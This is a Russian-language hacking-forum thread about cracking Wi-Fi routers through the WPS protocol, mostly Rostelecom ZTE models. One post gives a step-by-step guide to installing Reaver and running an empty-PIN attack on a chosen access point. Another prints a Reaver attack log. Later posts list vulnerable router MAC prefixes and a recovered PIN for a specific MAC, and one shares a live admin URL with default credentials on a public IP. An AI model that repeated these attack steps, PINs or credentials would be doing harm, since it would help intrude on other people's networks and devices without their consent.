Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,084
    Likes Received:
    7,691
    Reputations:
    101
    Но не на всех. :)
     
    fffsfs likes this.
  2. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    270
    Likes Received:
    10
    Reputations:
    0
    Тоесть сичас могу подклюца к тем MTSAa что там? А вот :MTS828FT-9FA4 вроде это название.Да? Через пиксю?
     
  3. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    270
    Likes Received:
    10
    Reputations:
    0
    А как ета добавить в писку? Не понимаю такои
     
  4. spassk14

    spassk14 New Member

    Joined:
    11 Sep 2017
    Messages:
    2
    Likes Received:
    4
    Reputations:
    0
    Пробовал с этим флагом -p "" взломать свой ростелекомовский роутер ZTE H118n (v2.3) не работает, не могли бы Вы написать гайд как его взламывали?

    +Я взламывал на Kali Linux, с новым Reaver t6x
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,084
    Likes Received:
    7,691
    Reputations:
    101
    Можете привести лог? Есть вероятность, что в reaver закрался баг.
    С помощью модифицированного Router Scan:
    https://forum.antichat.ru/posts/4122981

    Но он ещё публично не выпустился.
     
  6. fffsfs

    fffsfs Member

    Joined:
    17 Jan 2017
    Messages:
    270
    Likes Received:
    10
    Reputations:
    0
    08:86:3b:d8:2a:6d
    Два предложенных из роутер скан, даже не проверяет
     
  7. spassk14

    spassk14 New Member

    Joined:
    11 Sep 2017
    Messages:
    2
    Likes Received:
    4
    Reputations:
    0

    Сегодня попробовал, у меня все получилось)

    Гайд для владельцев ZTE H118N v2.3 (Ростелеком) (Взлом WPS):
    1.Загружаемся в Kali Linux( с флешки)
    2.Подключаемся к интернету (через Wi-Fi, или по кабелю)
    3.Запускаем терминал
    4.Устанавливаем libpcap-dev:
    А.sudo apt-get update (обновление репозитория Kali Linux)
    Б.sudo apt-get install libpcap-dev (Установка PCAP)
    5.Установка Reaver (t6x)
    А.git clone https://github.com/t6x/reaver-wps-fork-t6x
    Б.cd reaver-wps-fork-t6x*/
    cd src/
    ./configure
    make
    В.sudo make install
    5.Когда установили, перезапускаем Терминал
    6.Переводим Wi-Fi адаптер в режим монитора
    7.Вводим: airmon-ng kill (убиваем процессы при соединении по Wi-Fi)
    8.Ищем через wash -i wlan0mon (вместо wlan0mon вводите название Вашего адаптера в режиме монитора) точку, которую будете ломать
    9.Вводим команду (внимательно вводите, чтобы ошибок не было! P.S Вместо wlan0mon вводите ваш адаптер в режиме монитора, BSSID- MAC-Адрес роутера,которого взламываем)
    reaver -i wlan0mon -b bssid -vv -p "" -n
    10.Все, точка взломана)
     
  8. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    Спасибо,Мастер.Вот это мануальчик!
    Попробовал на ZXHN H108N но увы...
    Switching wlan1mon to channel 1
    [+] Waiting for beacon from 74:A7:8E:C1:******
    [+] Associated with 74:A7:8E:C1:****** (ESSID: RT-WiFi_****)
    [+] Trying pin "-n"
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Quitting after 1 crack attempts
    [-] Failed to recover WPA key
    [*] String pin was specified, nothing to save.
    Может что не так делаю? Опыта и знаний явно не хватает.
     
  9. fgh_2007

    fgh_2007 Elder - Старейшина

    Joined:
    28 Oct 2011
    Messages:
    76
    Likes Received:
    14
    Reputations:
    12
    ты подбираешь пин "-n"
    [+] Trying pin "-n"
     
    binarymaster likes this.
  10. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    А как должна выглядеть команда для пустого пина?
     
  11. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    600
    Likes Received:
    553
    Reputations:
    4
    -p ""
     
    Kakoluk likes this.
  12. muradddddd

    muradddddd Member

    Joined:
    19 May 2017
    Messages:
    163
    Likes Received:
    13
    Reputations:
    0
    А какие роутеры подаються
    к пустым пинам?
     
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,084
    Likes Received:
    7,691
    Reputations:
    101
    [​IMG]

    Информация уже собирается на 3WiFi.
    Две двойные кавычки после -p поставили? Если да, попробуйте убрать -n в конце.
     
    Kakoluk and Payer like this.
  14. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    286
    Likes Received:
    86
    Reputations:
    0
    CA:A3:66 - ZTE ZXHN H298N -p ""
     
    binarymaster likes this.
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,084
    Likes Received:
    7,691
    Reputations:
    101
    Добавил в список, спасибо!
     
  16. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    174
    Likes Received:
    23
    Reputations:
    0
    Какой алгоритм генерации у роутеров на базе Realtek RTL8671, встречаются с масками RT-WiFi_$$ (где $$ номер квартиры);
    октеты MAC разные, мне встречались 3 разных октета, Router скан один вскрыл, PIN: 05294176, для MAC: d4:bf:7f:52:89:4c.
    Пример интерфейса этого роутера для исследования: http://admin:admin@5.228.1.29/

    WPS PIN Companion почему-то PIN ассоциирует с Static PIN - UR-825AC
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,084
    Likes Received:
    7,691
    Reputations:
    101
    Неудивительно, это ведь Upvel.
     
  18. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    174
    Likes Received:
    23
    Reputations:
    0
    Пробовал вбивать этот PIN с ключом -p, перебор зацикливается на 90.91%, но в лок не уходит.
    Результат разумеется не выдаёт, может какие другие параметры указать для перебора?
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,084
    Likes Received:
    7,691
    Reputations:
    101
    Пустой пин код пробовали?

    Попробуйте последней ночной сборкой Router Scan, там эта фича недавно появилась.
     
  20. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    174
    Likes Received:
    23
    Reputations:
    0
    Не пойму как его активировать, сборка RS от 14 сентября, после посылки пакета M2, выдается ошибка [-] Unknown error 000B. PIN пробовал: 00000000
     
Loading...